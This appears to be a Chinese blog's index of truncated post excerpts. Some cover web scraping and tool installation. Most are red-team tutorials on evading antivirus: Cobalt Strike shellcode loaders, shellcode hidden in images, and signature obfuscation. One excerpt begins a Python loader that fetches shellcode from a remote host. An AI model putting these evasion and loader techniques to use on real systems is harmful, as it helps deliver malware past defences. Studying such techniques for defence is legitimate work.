摘要:
#conding:utf-8 import requests import sys #加载字典文件 #使用with .. as ..会自动关闭文件流;使用f = open(“filename.txt”,”r”) 需要close关闭文件流。 #每次读取1行 f.readline() #一次读取完 f. 阅读全文
摘要:
工具地址。https://github.com/madneal/gshark 下载最新版本 1、安装mysql brew install mysql mysql.server start 初始化的命令 : mysql_secure_installation 输入密码 进行配置 2、安装nginx b 阅读全文
摘要:
1、查壳工具 链接: https://pan.baidu.com/s/1F4VdYAbAASTq2MZyGDu_CQ 提取码: ki37 2、安装frida pip3 install frida pip3 install frida-tools 安装FRIDA-DEXDump git clone h 阅读全文
摘要:
#豆瓣电影 re爬虫import requests,re,csv url = "https://movie.douban.com/top250" headers={ "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0 阅读全文
摘要:
地址 https://github.com/Hangingsword/HouQing 修改key 生成shellcode 将生成的shellcode放入code.go 写入图片 go run code.go 11.jpeg 将11.jpeg放入vps 执行命令 开启web服务 python -m S 阅读全文
摘要:
1.使用cs生成bin文件 2.下载工具 https://github.com/9emin1/charlotte 安装mingw-w64* yum install mingw-w64* mac使用 brew install mingw-w64 3.修改payload.bin改名为beacon.bin 阅读全文
摘要:
1. import ctypes import base64 import requests #shell需要先进行base64加密,再进行hex加密 code = requests.get("http://192.168.1.1/123.txt") shellcode = bytearray(ba 阅读全文
摘要:
首先网上找一个加载器 pyinstaller -F -w 1.py 进行打包,使用火绒或者360检测 分步排查 每次增加几行代码,逐步找到特征值 找到特征码 分字符函数进行排查,确定字符RltMoveMemory为特征值 RtlMoveMemory作用为从指定内存中复制内存至另一内存里 此时进行混淆 阅读全文
摘要:
第一步cs生成python版测shellcode 第二步 提取双引号内容,并进行base64编码,放入python04.TXT 第三步 shellcode加载器修改地址,并进行base64加密,放入pythonshellcode.txt。同时将pythonshellcode.txt和python04 阅读全文
摘要:
https://forum.90sec.com/t/topic/1587 分析shellcode 将shellcode生成后,使用base64编码,放入buf。将代码写入内存,所以需要将代码解码并转为字节类型。在64位系统上运行,必须使用restype函数设置VirtualAlloc返回类型为cty 阅读全文